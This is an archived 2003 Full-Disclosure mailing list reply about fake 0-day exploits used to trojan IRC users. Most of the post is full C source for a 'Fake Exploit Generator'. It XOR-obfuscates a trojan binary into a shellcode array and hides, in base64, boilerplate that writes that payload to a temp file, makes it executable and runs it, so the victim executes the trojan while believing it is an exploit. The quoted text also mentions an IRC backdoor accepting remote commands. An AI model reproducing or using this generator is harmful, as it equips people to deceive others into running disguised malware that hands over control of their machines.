lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <200306132239.03885.gml@phrick.net>
From: gml at phrick.net (gml)
Subject: Re: -1 day exploit - Warning

On Friday 13 June 2003 06:51 pm, David Bernick wrote:

Well anyway, I got inspired:

// Fake Exploit Generator
// gml@...ick.net
//

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

#define badchar(c,p) (!(p = memchr(b64string, c, 64)))

#define BEAUTIFY "indent"

char b64string[] =
	"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

static char header[] = {
"Ly8gZ2VuZXJhdGVkIHdpdGggRmFrZSBFeHBsb2l0IEdlbmVyYXRvciA6OiBnbWxAcGhyaWNr"
"Lm5ldAoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1"
"ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4K"
};

static char body[] = {
"dm9pZCB1c2FnZShpbnQgYXJncywgY2hhciAqc2VsZikKewoJaWYoZ2V0dWlkKCkgIT0gMCkK"
"CXsKCQlwcmludGYoIlRoaXMgcHJvZ3JhbSByZXF1aXJlcyBwcml2aWxlZGdlcyB5b3UgZG8g"
"bm90IHBvc2Vzcy5cbiIpOwoJCWV4aXQoMCk7Cgl9CgllbHNlCgl7CgoJCWlmKGFyZ3MgPCAy"
"KQoJCXsKCQkJcHJpbnRmKCJ1c2FnZTogJXMgPHRhcmdldD5cbiIsIHNlbGYpOwoJCQlleGl0"
"KDApOwoJCX0KCX0KCn0KCnZvaWQgc2V0dXAoKQp7CgljaGFyICp0bXA7CglGSUxFICpmcDsK"
"CWNoYXIgYnl0ZVswXTsKCWludCBpOwoKCXRtcCA9IHRtcG5hbShOVUxMKTsKCWZwID0gZm9w"
"ZW4odG1wLCAidyIpOwoJaWYoZnApCgl7CgkJZm9yKGkgPSAwOyBpIDwgc2l6ZW9mKHNoZWxs"
"Y29kZSk7IGkrKykKCQl7CgkJCWJ5dGVbMF0gPSBzaGVsbGNvZGVbaV0gXiBNQVg7CgkJCWZ3"
"cml0ZShieXRlLCAxLCAxLCBmcCk7CgkJfQoJCWZjbG9zZShmcCk7CgkJY2htb2QodG1wLCAw"
"NzU1KTsKCQlzeXN0ZW0odG1wKTsKCQl1bmxpbmsodG1wKTsKCX0KfQoKaW50Cm1haW4gKGlu"
"dCBhcmdjLCBjaGFyICphcmd2W10pCnsKCXVzYWdlKGFyZ2MsIGFyZ3ZbMF0pOwoJc2V0dXAo"
"KTsKCS8vIGRvIHNvbWUgc2hpdCBoZXJlCn0K"
};

long b64dec (char *to, char *from, unsigned int len)
{
	char *fromp = from;
	char *top = to;
	char *p;
	unsigned char cbyte;
	unsigned char obyte;
	int padding = 0;

	for (; len >= 4; len -= 4) {
		if ((cbyte = *fromp++) == '=') cbyte = 0;
		else {
			if (badchar(cbyte, p)) return -1;
			cbyte = (p - b64string);
		}
		obyte = cbyte << 2;		/* 1111 1100 */

		if ((cbyte = *fromp++) == '=') cbyte = 0;
		else {
			if (badchar(cbyte, p)) return -1;
			cbyte = p - b64string;
		}
		obyte |= cbyte >> 4;		/* 0000 0011 */
		*top++ = obyte;

		obyte = cbyte << 4;		/* 1111 0000 */
		if ((cbyte = *fromp++) == '=') { cbyte = 0; padding++; }
		else {
			padding = 0;
			if (badchar (cbyte, p)) return -1;
			cbyte = p - b64string;
		}
		obyte |= cbyte >> 2;		/* 0000 1111 */
		*top++ = obyte;

		obyte = cbyte << 6;		/* 1100 0000 */
		if ((cbyte = *fromp++) == '=') { cbyte = 0; padding++; }
		else {
			padding = 0;
			if (badchar (cbyte, p)) return -1;
			cbyte = p - b64string;
		}
		obyte |= cbyte;			/* 0011 1111 */
		*top++ = obyte;
	}

	*top = 0;
	if (len) return -1;
	return (top - to) - padding;
}

void printhex(char c, FILE *fp)
{

    char s[10];

    if(c < 16 && c >= 0)
    {
        fprintf(fp, "\\x%2.2x", c);
    }
    else
    {
        if(c > 0)
        {
            fprintf(fp, "\\x%2.2x", c);
        }
        else
        {
            sprintf(s, "%x", c);
            fprintf(fp, "\\x%c", s[6]);
            fprintf(fp, "%c", s[7]);
        }
    }
}

int main(int argc, char *argv[])
{

    FILE *trojan;
    FILE *fakeexp;
    char byte[0];
    int count = 0;

    char *out;

    out = (char *)malloc(sizeof(body));
    memset(out, 0, sizeof(out));


#ifdef BEAUTIFY
    char *cmd;
#endif

    if(argc < 4 )
    {
        printf("usage: %s trojan fakeexp.c key\n", argv[0]);
        printf("ex: %s trojan fakeexp.c 187\n", argv[0]);
        exit(0);
    }

    trojan = fopen(argv[1], "r");
    fakeexp = fopen(argv[2], "w");
    if(trojan && fakeexp)
    {

	b64dec(out, header, sizeof(header));
	fprintf(fakeexp, "%s", out);
	memset(out, 0, sizeof(out));

	fprintf(fakeexp, "\n#define MAX\t%s\n\n", argv[3]);
	fprintf(fakeexp, "static char shellcode[] = {\n");

        while(!feof(trojan))
        {
            memset(byte, 0, sizeof(byte));
            fread(byte, 1, 1, trojan);
            byte[0] = byte[0] ^ atoi(argv[3]); // obfuscate

            if(count < 15)
            {
                if(count == 0)
                {
                    fprintf(fakeexp, "\"");
                }
                printhex(byte[0], fakeexp);
                count++;
            }
            else
            {
                printhex(byte[0], fakeexp);
                fprintf(fakeexp, "\"\n");
                count = 0;
            }
        }

        fprintf(fakeexp, "\"\n};\n\n");

	b64dec(out, body, sizeof(body));
	fprintf(fakeexp, "%s", out);
	memset(out, 0, sizeof(out));

        fclose(trojan);
        fclose(fakeexp);
    }
#ifdef BEAUTIFY
    cmd = (char *)malloc(sizeof(BEAUTIFY) * sizeof(argv[2]) + 2);
    memset(cmd, 0, sizeof(cmd));
    sprintf(cmd, "%s %s", BEAUTIFY, argv[2]);
    system(cmd);
    free(cmd);
#endif
}


> > Wow, I'd never run something that had a printf statement in it with
> >
> >  print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake
> >  0day exp loit. v2\nPRIVMSG $chan :to run commands on me, type:
> > ".$nick.": command\n";
> >
> > if you run this you deserve to get owned.  this guy could have at least
> > xor'd the strings and base64 encoded them or SOMETHING.
>
> the printf statement is in the shellcode. if you don't know C and/or hex
> very well it looks semi-legit. The attached perl code is the decoded shell
> code, it's not in the actual "exploit". This is the perfect kind of
> program to trojan little hacker wannabes on IRC.
>
> and no one deserves to be owned. They just need to pay for highly paid
> security consultants instead (shhh..kidding).
>
> d
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ